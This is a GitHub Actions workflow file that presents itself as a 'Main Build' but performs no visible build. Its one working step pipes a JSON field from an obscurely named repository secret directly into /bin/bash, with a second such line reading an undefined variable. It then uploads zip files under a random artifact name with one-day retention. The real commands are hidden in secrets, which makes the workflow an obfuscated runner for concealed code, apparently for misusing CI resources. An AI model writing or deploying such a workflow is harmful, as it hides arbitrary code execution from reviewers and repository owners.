name: Main Build
on:
  workflow_dispatch:

permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          eihu94: ${{ secrets.eihu94 }}
        run: |
          printf '%s' "$eihu94" | jq -r .tv5894 | /bin/bash
          echo $idn931 | jq -r .cpw05 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: FH7KWiSW
          path: "*.zip"
          retention-days: 1
